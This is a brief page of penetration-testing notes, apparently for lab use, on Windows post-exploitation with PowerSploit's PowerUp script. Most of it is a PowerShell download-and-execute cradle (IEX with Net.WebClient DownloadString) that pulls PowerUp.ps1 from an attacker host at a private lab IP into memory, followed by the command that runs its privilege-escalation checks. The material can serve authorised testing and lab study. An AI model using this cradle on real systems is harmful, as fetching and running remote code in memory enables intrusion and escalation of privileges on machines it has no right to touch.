Post exploitation modules(Windows)

PowerUp

use the powerup script in Powersploit/Privesc/

IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.131/PowerUp.ps1')

and to execute it,

run "Invoke-AllChecks"

Last updated